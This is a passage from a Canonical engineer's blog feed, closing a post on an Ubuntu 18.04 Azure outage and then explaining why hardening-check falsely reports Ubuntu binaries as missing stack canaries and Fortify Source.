<h1 id="aftermath">Aftermath</h1>
<p>A few noteworthy things happened after the update was released.</p>
<h2 id="azure-post-incident-writeup">Azure Post Incident Writeup</h2>
<p>Microsoft Azure has written up their own Post Incident Review (PIR), which you
can find on the Azure Status website:</p>
<p><a href="https://status.azure.com/en-us/status/history/">Azure Status History</a></p>
<p>Make sure you click the “all” setting for timescale, and search for the terms:</p>
<p><code class="language-plaintext highlighter-rouge">Post Incident Review (PIR) - Canonical Ubuntu issue impacted VMs and AKS (Tracking ID 2TWN-VT0)</code></p>
<p>I can’t seem to find a dedicated link. Regardless, they talk about the need for
extra testing and validation, something we will work towards in the near future.</p>
<h2 id="open-vm-tools">open-vm-tools</h2>
<p>You might be wondering what happened to open-vm-tools, since it started this
whole chain of events.</p>
<p>It turns out, there was a bug already open to limit the scope of <code class="language-plaintext highlighter-rouge">udevadm trigger</code>
to just the scsi subsystem, since it was only needed there and nowhere else:</p>
<p><a href="https://bugs.launchpad.net/ubuntu/+source/open-vm-tools/+bug/1968354">LP1968354 Please do not run udevadm trigger without parameters</a></p>
<p>This change had been put on hold because it was low priority and a one line
fix; typically we hold off on these types of updates to reduce churn, and
instead pair them up with another SRU and piggyback on that.</p>
<p>But due to the high profile of the outage it caused, it was fixed shortly after
the systemd package was released.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff --git a/debian/changelog b/debian/changelog
index 0bfea9a..b8f3ae7 100644
--- a/debian/changelog
+++ b/debian/changelog
@@ -1,3 +1,11 @@
+open-vm-tools (2:11.0.5-4ubuntu0.18.04.3) bionic; urgency=medium
+
+ * d/open-vm-tools.postinst: Fixes issue with "udevadm trigger"
+ affecting all devices that can cause unwanted side-effects.
+ (LP: #1968354)
+
+ -- Bryce Harrington <bryce@canonical.com> Mon, 19 Sep 2022 22:14:07 +0000
+
open-vm-tools (2:11.0.5-4ubuntu0.18.04.2) bionic-security; urgency=medium
* SECURITY UPDATE: local privilege escalation
diff --git a/debian/open-vm-tools.postinst b/debian/open-vm-tools.postinst
index f181ab2..aa224fb 100644
--- a/debian/open-vm-tools.postinst
+++ b/debian/open-vm-tools.postinst
@@ -5,7 +5,7 @@ set -e
case "${1}" in
configure)
if which udevadm 1>/dev/null; then
- udevadm trigger || true
+ udevadm trigger --type=devices --subsystem-match=scsi || true
fi
;;
</code></pre></div></div>
<p>From the debdiff, we see it has been changed to <code class="language-plaintext highlighter-rouge">udevadm trigger --type=devices --subsystem-match=scsi</code> in
version <code class="language-plaintext highlighter-rouge">2:11.0.5-4ubuntu0.18.04.3</code>. Hopefully this extra safeguard will make
sure something like this doesn’t happen again on the next open-vm-tools SRU.</p>
<h2 id="ubuntu-security-podcast">Ubuntu Security Podcast</h2>
<p>A few days after the update was released, Alex Murray reached out and suggested
we have a debrief on the Ubuntu Security Podcast, where we talk about the
regression, what happened, how we worked to solve the issue, and give a brief
idea of how we tested and validated the fix.</p>
<p>Nishit spoke as well, and I enjoyed having the opportunity to be on the podcast.
Maybe I should make another appearance sometime.</p>
<p><a href="https://ubuntusecuritypodcast.org/episode-177/">Listen to Episode 177 of the Ubuntu Security Podcast</a></p>
<audio style="width: 100%" controls="" preload="none">
<source src="https://people.canonical.com/~amurray/USP/USP_E177.mp3" type="audio/mp3" />
</audio>
<h1 id="lessons-learned">Lessons Learned</h1>
<p>I think the key takeaways from this outage are the following:</p>
<ol>
<li>Keep calm, and think logically during an outage, even when the world is watching.</li>
<li>Never rush to deliver a fix, instead test and aim to get stakeholder signoff before release. They might think of something that you haven’t.</li>
<li>Ask for help from your immediate colleagues and across teams when you need it, it is not a sign of weakness, but a desire to deliver the best fix possible, the first time, and having advice from world class engineers drives you toward that goal, especially when you are under pressure.</li>
</ol>
<h1 id="conclusion">Conclusion</h1>
<p>Well, I hope you enjoyed the deep dive into the interesting and very strange
case of a complex interaction between two packages causing a cloud wide outage.</p>
<p>It is not often that the interaction between two packages causes issues; most bugs are
contained within a single package. But in this case, open-vm-tools primed the
systems just enough to bring a dormant systemd bug to the surface, over 4.5
years after the initial release of Bionic.</p>
<p>We covered how we came up with the minimal reproducer, analysed the systemd bug
and backported the fix; how not rushing to put out a fix saved us from another
cloud wide outage; how working together and valuing everyone’s input produced a
successful preinstall script to fix already primed systems; and how we delivered
the fix worldwide.</p>
<p>Hopefully you enjoyed the read, and as always feel free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellDuring my work as a Sustaining Engineer at Canonical, occasionally I get tasked with analysing and fixing high profile regressions that turn into world ending emergencies. I think I have worked on four or five of these cases now, and behind each and every one there is a story to tell, and lessons to be learned. Today, we will dive into the intricate and complex series of events that caused the worldwide Azure AKS Cloud outage, for systems running Ubuntu 18.04 LTS, which I had the responsibility and leadership to resolve. So, go brew a cup of coffee or whip up a hot chocolate, and let’s recount the events that happened four months ago, and how we worked to resolve them without causing another world ending event to occur.Investigating Missing Stack Canaries and Fortify Source on Binaries2022-06-10T00:00:00+00:002022-06-10T00:00:00+00:00https://ruffell.nz/programming/writeups/2022/06/10/investigating-missing-stack-canaries-and-fortify-source<p>Not too long ago, I worked on a fairly interesting case where a user claimed
that many of the binaries on their system were missing Stack Canaries provided
through <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> and additionally, many were missing
Fortify Source being enabled through <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code>.</p>
<p>This is most unusual, since these compiler flags, along with many others, are
enabled by default for all packages in the Ubuntu archive.</p>
<p><img src="/assets/images/2022_001.png" alt="hero" /></p>
<p>So in this writeup, we are going to investigate this user’s claims, and try to get
to the bottom of the mystery of the missing compiler hardening options in
binaries from the Ubuntu archive. Stay tuned.</p>
<!--more-->
<h1 id="what-even-are-stack-canaries-and-fortify-source">What Even are Stack Canaries and Fortify Source?</h1>
<p>We are referring to a set of compiler flags that GCC and LLVM support in regard
to applying security hardening features to binaries at compile time, so that
they might be able to detect mischief at runtime. These flags are designed to
be implemented in any program, and the programmer doesn’t need to know they are
there for them to work.</p>
<h2 id="stack-canaries">Stack Canaries</h2>
<p>Stack Canaries provide a basic check to see if a buffer overflow has occurred
before we return from a function call, that is, before we pop the return address off the
stack and use it as the next instruction pointer to be executed.</p>
<p>The compiler adds a “canary” at compile time, which is just a random number placed
between the local variables and the saved return address in the stack frame. When we go to
return from the function, we test the number on the stack against what we expect it to be,
and if it matches, it is likely no buffer overflow has occurred, and we return. If the check
fails, we call <code class="language-plaintext highlighter-rouge">__stack_chk_fail</code>, which prints the below error and kills the process, since
it is very likely something has overflowed the stack frame, and it could be an
attacker trying to redirect the flow of execution to elsewhere in the program.</p>
<p>The error:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>*** stack smashing detected ***
Aborted
</code></pre></div></div>
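<p>To make this concrete, here is a tiny, purely illustrative C program (not taken from
any Ubuntu package) showing the kind of function <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code>
instruments, assuming a build with gcc:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <string.h>

/* A local character array is exactly what -fstack-protector-strong
 * instruments: the compiler places a random canary between the locals
 * and the saved return address on entry, and verifies it before
 * returning. */
void greet(const char *name)
{
    char buffer[32];

    /* If name is longer than buffer, this overflows the stack frame,
     * clobbers the canary, and __stack_chk_fail() aborts the process
     * with "*** stack smashing detected ***". */
    strcpy(buffer, name);
    printf("Hello, %s\n", buffer);
}

int main(int argc, char **argv)
{
    greet(argc > 1 ? argv[1] : "world");
    return 0;
}
</code></pre></div></div>
<p>Building this with <code class="language-plaintext highlighter-rouge">gcc -fstack-protector-strong greet.c -o greet</code> should leave a
reference to <code class="language-plaintext highlighter-rouge">__stack_chk_fail</code> in the resulting binary, which is the breadcrumb we will
go looking for later in this article.</p>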
<h2 id="fortify-source">Fortify Source</h2>
<p>Fortify Source builds on the idea of Stack Canaries, by adding a few more checks
to various functions to catch buffer overflows. It instruments
functions like <code class="language-plaintext highlighter-rouge">memcpy</code>, <code class="language-plaintext highlighter-rouge">strcat</code> and <code class="language-plaintext highlighter-rouge">strncpy</code>, adding things like extra
length checks against the known size of the destination buffer, argument
consistency checks, that sort of thing.</p>
<p>The compiler transparently replaces calls to normal <code class="language-plaintext highlighter-rouge">memcpy</code> etc with those of
the form <code class="language-plaintext highlighter-rouge">__memcpy_chk</code>.</p>
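<p>As a hedged illustration (again, not from any real package), this is the sort of call
Fortify Source rewrites when building with <code class="language-plaintext highlighter-rouge">-O2 -D_FORTIFY_SOURCE=2</code>; the exact
transformation depends on what the compiler can prove about the destination buffer:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <string.h>

struct record {
    char name[16];
    int  id;
};

/* With -O2 -D_FORTIFY_SOURCE=2, glibc's headers route this strcpy
 * through the fortified builtin, because the compiler knows the
 * destination is a 16 byte array. When the copy cannot be proven safe
 * at compile time, the emitted call becomes __strcpy_chk(), which
 * checks the length at runtime and aborts on overflow. */
void set_name(struct record *r, const char *name)
{
    strcpy(r->name, name);
}
</code></pre></div></div>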
<h1 id="the-problem">The Problem</h1>
<p>The user opened a case, and provided a big list of binaries that seemed to be
missing Stack Canaries and Fortify Source protections, and didn’t offer much
more information. I suspected that the user was running some sort of
automated scanning tool over their system, and this was just its output.</p>
<p>For example, let’s look at a freshly debootstrapped Jammy system:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Binaries missing Stack Canaries:
/usr/bin/clear
/usr/bin/dbus-uuidgen
/usr/bin/free
/usr/bin/getconf
/usr/bin/locale-check
/usr/bin/rev
/usr/bin/tabs
/usr/bin/tempfile
/usr/bin/xxd
/usr/sbin/findfs
/usr/sbin/fstab-decode
/usr/sbin/ldconfig.real
/usr/sbin/mklost+found
/usr/sbin/nologin
/usr/sbin/pivot_root
/usr/sbin/setcap
/usr/sbin/vcstime
Binaries missing Fortify Source:
/usr/bin/apt
/usr/bin/apt-cdrom
/usr/bin/apt-config
/usr/bin/apt-extracttemplates
/usr/bin/apt-get
/usr/bin/apt-mark
/usr/bin/apt-sortpkgs
/usr/bin/getconf
/usr/bin/getent
/usr/bin/iconv
/usr/bin/ischroot
/usr/bin/locale
/usr/bin/localedef
/usr/bin/pldd
/usr/bin/update-mime-database
/usr/bin/zdump
/usr/sbin/dmsetup
/usr/sbin/dmstats
/usr/sbin/iconvconfig
/usr/sbin/ldconfig.real
/usr/sbin/zic
</code></pre></div></div>
<p>The actual output was quite a bit longer, and more like the following list,
taken from a fresh Jammy Server VM with <code class="language-plaintext highlighter-rouge">devscripts</code> installed:</p>
<p><a href="/assets/bin/devscripts_missing_canaries_fortify_sources.txt">Example output from a system with more packages.</a></p>
<p>I was quite surprised at the number of binaries which claim to have no Stack
Canaries present, and are also missing Fortify Source protections. I thought
that this had to be a mistake, since these protections are enabled for all
packages by default.</p>
<h1 id="compiler-flags-set-in-ubuntu-by-default">Compiler Flags Set in Ubuntu by Default</h1>
<p>If you are ever wondering what compiler flags your binaries are built with by
default in the Ubuntu archive, have a read of the <a href="https://wiki.ubuntu.com/ToolChain/CompilerFlags">CompilerFlags</a>
wiki page.</p>
<h2 id="stack-canaries-1">Stack Canaries</h2>
<p>Reading the wiki page, <code class="language-plaintext highlighter-rouge">-fstack-protector</code> has been enabled for all packages
by default since Ubuntu 6.10, and coverage was extended to more binaries being
built with the stack protector via
<code class="language-plaintext highlighter-rouge">--param ssp-buffer-size=4</code> by default in 10.10.</p>
<p>Currently <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> is the default compiler flag, and this has
been enabled for all packages since 14.10.</p>
<h2 id="fortify-source-1">Fortify Source</h2>
<p>The wiki mentions <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code> has been enabled for all packages since
8.10, which is a really long time. It does only apply to packages built with
<code class="language-plaintext highlighter-rouge">-O1</code> optimisation or higher, but I would expect the number of packages not
using <code class="language-plaintext highlighter-rouge">-O2</code> or higher to be very low.</p>
<p>So why do we have so many binaries which claim to be missing these protections?</p>
<h1 id="manual-checking">Manual Checking</h1>
<p>A good quick way to check a binary is to examine the build log, and see if it
includes the compiler flags when the object file is being built.</p>
<h2 id="stack-canaries-2">Stack Canaries</h2>
<p>Let’s take the first item off the list for missing Stack Canaries, <code class="language-plaintext highlighter-rouge">/usr/bin/clear</code>.</p>
<p><code class="language-plaintext highlighter-rouge">/usr/bin/clear</code> is part of the <code class="language-plaintext highlighter-rouge">ncurses-bin</code> package:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ apt-file search /usr/bin/clear
ncurses-bin: /usr/bin/clear
</code></pre></div></div>
<p>We can look this package up on Launchpad, <a href="https://launchpad.net/ubuntu/+source/ncurses/6.3-2">ncurses 6.3-2</a>
and from there find the <a href="https://launchpad.net/ubuntu/+source/ncurses/6.3-2/+build/23070422">build for Jammy</a>
and then we can examine the <a href="https://launchpadlibrarian.net/580830290/buildlog_ubuntu-jammy-amd64.ncurses_6.3-2_BUILDING.txt.gz">buildlog for Jammy</a></p>
<p>Eventually, we find where it is compiled:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gcc -DHAVE_CONFIG_H -I../progs -I. -I../../progs -I../include -I../../progs/../include
-Wdate-time -D_FORTIFY_SOURCE=2 -D_DEFAULT_SOURCE -D_XOPEN_SOURCE=600 -DNDEBUG
-g -O2 -ffile-prefix-map=/<<PKGBUILDDIR>>=. -flto=auto -ffat-lto-objects -flto=auto
-ffat-lto-objects -fstack-protector-strong -Wformat --param max-inline-insns-single=1200
-Werror=format-security -fPIC -c ../../progs/clear.c -o ../obj_s/clear.o
</code></pre></div></div>
<p>It very clearly has <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> enabled. This is a false positive.</p>
<h2 id="fortify-source-2">Fortify Source</h2>
<p>Again, let’s take the first item off the list for missing Fortify Source,
<code class="language-plaintext highlighter-rouge">/usr/bin/apt</code>. This is obviously part of the <code class="language-plaintext highlighter-rouge">apt</code> package, so let’s find
<a href="https://launchpad.net/ubuntu/+source/apt/2.4.5">apt on launchpad</a>, and next
the <a href="https://launchpad.net/ubuntu/+source/apt/2.4.5/+build/23537350">build for Jammy</a>
and then the <a href="https://launchpadlibrarian.net/596069244/buildlog_ubuntu-jammy-amd64.apt_2.4.5_BUILDING.txt.gz">buildlog for Jammy</a>.</p>
<p>After looking for a long time, we come across:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[103/1085] : && /usr/bin/c++ -g -O2 -ffile-prefix-map=/<<PKGBUILDDIR>>=. -flto=auto
-ffat-lto-objects -flto=auto -ffat-lto-objects -fstack-protector-strong -Wformat
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -Wl,-Bsymbolic-functions
-flto=auto -ffat-lto-objects -flto=auto -Wl,-z,relro -Wl,-z,now -Wl,--as-needed
cmdline/CMakeFiles/apt.dir/apt.cc.o -o cmdline/apt -Wl,
-rpath,/<<PKGBUILDDIR>>/obj-x86_64-linux-gnu/apt-private:/<<PKGBUILDDIR>>/obj-x86_64-linux-gnu/apt-pkg:
apt-private/libapt-private.so.0.0.0 apt-pkg/libapt-pkg.so.6.0.0 && :
</code></pre></div></div>
<p>This also very clearly has <code class="language-plaintext highlighter-rouge">-D_FORTIFY_SOURCE=2</code> enabled. Another false positive.</p>
<h1 id="automated-scanning-tools">Automated Scanning Tools</h1>
<p>So, now we are beginning to suspect that whatever automated scanning tool was
being used is missing information and is not able to determine if these compiler
flags have been enabled or not.</p>
<p>Now we just need to find a tool and see how it works, so we can investigate its
shortcomings.</p>
<p>I came across the upstream <a href="https://wiki.debian.org/Hardening">Debian hardening wiki page</a>,
and found the validation section particularly interesting.</p>
<p>It suggested running “hardening-check” from the devscripts package, so I tried
that for a known good binary, such as /usr/bin/ls:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ hardening-check /usr/bin/ls
/usr/bin/ls:
Position Independent Executable: yes
Stack protected: yes
Fortify Source functions: yes (some protected functions found)
Read-only relocations: yes
Immediate binding: yes
Stack clash protection: yes
Control flow integrity: yes
</code></pre></div></div>
<p>Okay, hardening-check can tell if the stack canary is present, and if fortify
source hardened functions are present.</p>
<p>I wrote up a quick script that calls <code class="language-plaintext highlighter-rouge">hardening-check</code>, and prints the binaries
“missing” Stack Canaries and Fortify Source to the output. This script is how
I created the two outputs in “The Problem” section.</p>
<div class="language-sh highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">BINARIES</span><span class="o">=</span><span class="s2">"/usr/bin/* /usr/sbin/*"</span>
<span class="nb">echo</span> <span class="s2">"Binaries missing Stack Canaries:"</span>
<span class="k">for </span>f <span class="k">in</span> <span class="nv">$BINARIES</span>
<span class="k">do
</span>hardening-check <span class="nv">$f</span> 2> /dev/null | <span class="nb">grep</span> <span class="s2">"Stack protected"</span> | <span class="nb">grep</span> <span class="nt">-q</span> <span class="s2">"no"</span> <span class="o">&&</span> <span class="nb">echo</span> <span class="nv">$f</span>
<span class="k">done
</span><span class="nb">echo
echo</span> <span class="s2">"Binaries missing Fortify Source:"</span>
<span class="k">for </span>f <span class="k">in</span> <span class="nv">$BINARIES</span>
<span class="k">do
</span>hardening-check <span class="nv">$f</span> 2> /dev/null | <span class="nb">grep</span> <span class="s2">"Fortify Source"</span> | <span class="nb">grep</span> <span class="nt">-q</span> <span class="s2">"no"</span> <span class="o">&&</span> <span class="nb">echo</span> <span class="nv">$f</span>
<span class="k">done
</span><span class="nb">echo</span>
</code></pre></div></div>
<p>Okay, now we have an automated scanning tool of our own, so let’s dig into how it
works.</p>
<h1 id="investigation">Investigation</h1>
<p>I imagine what <code class="language-plaintext highlighter-rouge">hardening-check</code> is doing is dumping the dynamic symbol table
of the ELF binary, and comparing the functions found there to their hardened counterparts.</p>
<p>e.g.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/ls
/usr/bin/ls: file format elf64-x86-64
DYNAMIC SYMBOL TABLE:
00000 DF *UND* 00000 (GLIBC_2.3) __ctype_toupper_loc
00000 DF *UND* 00000 (GLIBC_2.2.5) getenv
00000 DO *UND* 00000 (GLIBC_2.2.5) __progname
00000 DF *UND* 00000 (GLIBC_2.2.5) sigprocmask
00000 DF *UND* 00000 (GLIBC_2.3.4) __snprintf_chk
00000 DF *UND* 00000 (GLIBC_2.2.5) raise
00000 DF *UND* 00000 (GLIBC_2.34) __libc_start_main
00000 DF *UND* 00000 (GLIBC_2.2.5) abort
00000 DF *UND* 00000 (GLIBC_2.2.5) __errno_location
00000 DF *UND* 00000 (GLIBC_2.2.5) strncmp
00000 w D *UND* 00000 Base _ITM_deregisterTMCloneTable
00000 DO *UND* 00000 (GLIBC_2.2.5) stdout
00000 DF *UND* 00000 (GLIBC_2.2.5) localtime_r
00000 DF *UND* 00000 (GLIBC_2.2.5) _exit
00000 DF *UND* 00000 (GLIBC_2.2.5) strcpy
00000 DF *UND* 00000 (GLIBC_2.4) __mbstowcs_chk
00000 DF *UND* 00000 (GLIBC_2.2.5) __fpending
00000 DF *UND* 00000 (GLIBC_2.2.5) isatty
00000 DF *UND* 00000 (GLIBC_2.2.5) sigaction
00000 DF *UND* 00000 (GLIBC_2.2.5) iswcntrl
00000 DF *UND* 00000 (GLIBC_2.2.5) wcswidth
00000 DF *UND* 00000 (GLIBC_2.2.5) localeconv
00000 DF *UND* 00000 (GLIBC_2.2.5) mbstowcs
00000 DF *UND* 00000 (GLIBC_2.2.5) readlink
00000 DF *UND* 00000 (GLIBC_2.17) clock_gettime
00000 DF *UND* 00000 (GLIBC_2.2.5) setenv
00000 DF *UND* 00000 (GLIBC_2.2.5) textdomain
00000 DF *UND* 00000 (GLIBC_2.2.5) fclose
00000 DO *UND* 00000 (GLIBC_2.2.5) optind
00000 DF *UND* 00000 (GLIBC_2.2.5) opendir
00000 DF *UND* 00000 (GLIBC_2.2.5) getpwuid
00000 DF *UND* 00000 (GLIBC_2.2.5) bindtextdomain
00000 DF *UND* 00000 (GLIBC_2.2.5) dcgettext
00000 DF *UND* 00000 (GLIBC_2.2.5) __ctype_get_mb_cur_max
00000 DF *UND* 00000 (GLIBC_2.2.5) strlen
00000 DF *UND* 00000 (GLIBC_2.4) __stack_chk_fail
00000 DF *UND* 00000 (GLIBC_2.2.5) getopt_long
00000 DF *UND* 00000 (GLIBC_2.2.5) mbrtowc
00000 DF *UND* 00000 (LIBSELINUX_1.0) freecon
00000 DF *UND* 00000 (GLIBC_2.2.5) strchr
00000 DF *UND* 00000 (GLIBC_2.2.5) getgrgid
00000 DF *UND* 00000 (GLIBC_2.2.5) snprintf
00000 DF *UND* 00000 (GLIBC_2.2.5) __overflow
00000 DF *UND* 00000 (GLIBC_2.2.5) strrchr
00000 DF *UND* 00000 (GLIBC_2.2.5) gmtime_r
00000 DF *UND* 00000 (GLIBC_2.2.5) lseek
00000 DF *UND* 00000 (GLIBC_2.2.5) __assert_fail
00000 DF *UND* 00000 (GLIBC_2.2.5) fnmatch
00000 DF *UND* 00000 (GLIBC_2.2.5) memset
00000 DF *UND* 00000 (GLIBC_2.2.5) ioctl
00000 DF *UND* 00000 (GLIBC_2.2.5) getcwd
00000 DF *UND* 00000 (GLIBC_2.2.5) closedir
00000 DF *UND* 00000 (GLIBC_2.33) lstat
00000 DF *UND* 00000 (GLIBC_2.2.5) memcmp
00000 DF *UND* 00000 (GLIBC_2.2.5) _setjmp
00000 DF *UND* 00000 (GLIBC_2.2.5) fputs_unlocked
00000 DF *UND* 00000 (GLIBC_2.2.5) calloc
00000 DF *UND* 00000 (GLIBC_2.2.5) strcmp
00000 DF *UND* 00000 (GLIBC_2.2.5) signal
00000 DF *UND* 00000 (GLIBC_2.2.5) dirfd
00000 DF *UND* 00000 (GLIBC_2.2.5) fputc_unlocked
00000 DO *UND* 00000 (GLIBC_2.2.5) optarg
00000 DF *UND* 00000 (GLIBC_2.3.4) __memcpy_chk
00000 DF *UND* 00000 (GLIBC_2.2.5) sigemptyset
00000 w D *UND* 00000 Base __gmon_start__
00000 DF *UND* 00000 (GLIBC_2.14) memcpy
00000 DO *UND* 00000 (GLIBC_2.2.5) program_invocation_name
00000 DF *UND* 00000 (GLIBC_2.2.5) tzset
00000 DF *UND* 00000 (GLIBC_2.2.5) fileno
00000 DF *UND* 00000 (GLIBC_2.2.5) tcgetpgrp
00000 DF *UND* 00000 (GLIBC_2.2.5) readdir
00000 DF *UND* 00000 (GLIBC_2.2.5) wcwidth
00000 DF *UND* 00000 (GLIBC_2.2.5) fflush
00000 DF *UND* 00000 (GLIBC_2.2.5) nl_langinfo
00000 DF *UND* 00000 (GLIBC_2.2.5) strcoll
00000 DF *UND* 00000 (GLIBC_2.2.5) mktime
00000 DF *UND* 00000 (GLIBC_2.2.5) __freading
00000 DF *UND* 00000 (GLIBC_2.2.5) fwrite_unlocked
00000 DF *UND* 00000 (GLIBC_2.2.5) realloc
00000 DF *UND* 00000 (GLIBC_2.2.5) stpncpy
00000 DF *UND* 00000 (GLIBC_2.2.5) setlocale
00000 DF *UND* 00000 (GLIBC_2.3.4) __printf_chk
00000 DF *UND* 00000 (GLIBC_2.28) statx
00000 DF *UND* 00000 (GLIBC_2.2.5) timegm
00000 DF *UND* 00000 (GLIBC_2.2.5) strftime
00000 DF *UND* 00000 (GLIBC_2.2.5) mempcpy
00000 DF *UND* 00000 (GLIBC_2.2.5) memmove
00000 DF *UND* 00000 (GLIBC_2.2.5) error
00000 DO *UND* 00000 (GLIBC_2.2.5) __progname_full
00000 DF *UND* 00000 (GLIBC_2.2.5) fseeko
00000 DF *UND* 00000 (GLIBC_2.2.5) strtoumax
00000 DF *UND* 00000 (GLIBC_2.2.5) unsetenv
00000 DF *UND* 00000 (GLIBC_2.2.5) __cxa_atexit
00000 DF *UND* 00000 (GLIBC_2.2.5) wcstombs
00000 DF *UND* 00000 (GLIBC_2.3) getxattr
00000 DF *UND* 00000 (GLIBC_2.2.5) gethostname
00000 DF *UND* 00000 (GLIBC_2.2.5) sigismember
00000 DF *UND* 00000 (GLIBC_2.2.5) exit
00000 DF *UND* 00000 (GLIBC_2.2.5) fwrite
00000 DF *UND* 00000 (GLIBC_2.3.4) __fprintf_chk
00000 w D *UND* 00000 Base _ITM_registerTMCloneTable
00000 DF *UND* 00000 (LIBSELINUX_1.0) getfilecon
00000 DF *UND* 00000 (GLIBC_2.2.5) fflush_unlocked
00000 DF *UND* 00000 (GLIBC_2.2.5) mbsinit
00000 DF *UND* 00000 (LIBSELINUX_1.0) lgetfilecon
00000 DO *UND* 00000 (GLIBC_2.2.5) program_invocation_short_name
00000 DF *UND* 00000 (GLIBC_2.2.5) iswprint
00000 DF *UND* 00000 (GLIBC_2.2.5) sigaddset
00000 DF *UND* 00000 (GLIBC_2.3) __ctype_tolower_loc
00000 DF *UND* 00000 (GLIBC_2.3) __ctype_b_loc
00000 DO *UND* 00000 (GLIBC_2.2.5) stderr
00000 DF *UND* 00000 (GLIBC_2.3.4) __sprintf_chk
220a0 g DO .data 00008 Base obstack_alloc_failed_handler
0fcc0 g DF .text 00128 Base _obstack_newchunk
0fca0 g DF .text 00019 Base _obstack_begin_1
106e0 g DF .text 00037 Base _obstack_allocated_p
00000 w DF *UND* 00000 (GLIBC_2.2.5) __cxa_finalize
00000 DF *UND* 00000 (GLIBC_2.2.5) free
0fc80 g DF .text 00015 Base _obstack_begin
00000 DF *UND* 00000 (GLIBC_2.2.5) malloc
107b0 g DF .text 00026 Base _obstack_memory_used
10720 g DF .text 00085 Base _obstack_free
</code></pre></div></div>
<p>We can see that the Stack Canary fail check is present:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~$ objdump -T /usr/bin/ls | grep __stack_chk_fail
00000 DF *UND* 00000 (GLIBC_2.4) __stack_chk_fail
</code></pre></div></div>
<p>We can also see some fortify source functions present:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/ls | grep chk
00000 DF *UND* 00000 (GLIBC_2.3.4) __snprintf_chk
00000 DF *UND* 00000 (GLIBC_2.4) __mbstowcs_chk
00000 DF *UND* 00000 (GLIBC_2.4) __stack_chk_fail
00000 DF *UND* 00000 (GLIBC_2.3.4) __memcpy_chk
00000 DF *UND* 00000 (GLIBC_2.3.4) __printf_chk
00000 DF *UND* 00000 (GLIBC_2.3.4) __fprintf_chk
00000 DF *UND* 00000 (GLIBC_2.3.4) __sprintf_chk
</code></pre></div></div>
<p>If <code class="language-plaintext highlighter-rouge">hardening-check</code> sees the presence of these functions, it says, yes, it
does have the compiler flag enabled. If they are missing, it reports, no, not
enabled.</p>
<p>Now that we have a good idea of how this scanning tool works, let’s have a look at
a few examples.</p>
<h2 id="stack-canaries-3">Stack Canaries</h2>
<p><code class="language-plaintext highlighter-rouge">/usr/bin/clear</code> is the first item on the missing stack canary list. Let’s run it
through hardening-check:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ hardening-check /usr/bin/clear
/usr/bin/clear:
Position Independent Executable: yes
Stack protected: no, not found!
Fortify Source functions: yes
Read-only relocations: yes
Immediate binding: yes
Stack clash protection: unknown, no -fstack-clash-protection instructions found
Control flow integrity: yes
</code></pre></div></div>
<p>Interesting, “Stack protected: no, not found!”.</p>
<p>Running it through objdump, we look for <code class="language-plaintext highlighter-rouge">__stack_chk_fail</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ objdump -T /usr/bin/clear | grep __stack_chk_fail
</code></pre></div></div>
<p>We get no output. The function isn’t present. We know from when we manually
checked the build log earlier that <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code> is enabled.</p>
<p>So why don’t we see <code class="language-plaintext highlighter-rouge">__stack_chk_fail</code> referenced in the dynamic symbol table?</p>
<p>The answer is in the <a href="https://wiki.debian.org/Hardening">Hardening Wiki</a> page, again in the validation section:</p>
<blockquote>
<p>If your binary does not make use of character arrays on the stack, it’s
possible that “Stack protected” will report “no”, since there was no stack it
found to protect. If you absolutely want to protect all stacks, you can add
“-fstack-protector-all”, but this tends not to be needed, and there are some
trade-offs on speed.</p>
</blockquote>
<p>It is likely that <code class="language-plaintext highlighter-rouge">/usr/bin/clear</code> does not process any character arrays
on the stack, and thus, there is no need for stack canaries to be implemented,
and the compiler has made a conscious decision to omit them for performance
reasons.</p>
<p>Looking through the rest of the binaries listed under missing stack canaries,
most of them don’t do much string processing, making the above conclusion
reasonable.</p>
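<p>For contrast, here is a small, made-up example of the kind of function that gets no
canary even when built with <code class="language-plaintext highlighter-rouge">-fstack-protector-strong</code>, because there is no
stack buffer for an overflow to target:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* No local arrays and no address-taken locals: -fstack-protector-strong
 * has nothing to guard here, so the compiler emits no canary check. */
int checksum(const int *values, int count)
{
    int sum = 0;

    for (int i = 0; i < count; i++)
        sum += values[i];

    return sum;
}
</code></pre></div></div>
<p>If every function in a binary looks roughly like this, the binary never references
<code class="language-plaintext highlighter-rouge">__stack_chk_fail</code>, and hardening-check reports “Stack protected: no” even though
the flag was passed on the compiler command line.</p>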
<h2 id="fortify-source-3">Fortify Source</h2>
<p>Let’s move onto the fortify source section.</p>
<p>The first item on the list is <code class="language-plaintext highlighter-rouge">/usr/bin/apt</code>. Let’s run this through
hardening-check.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ hardening-check /usr/bin/apt
/usr/bin/apt:
Position Independent Executable: yes
Stack protected: yes
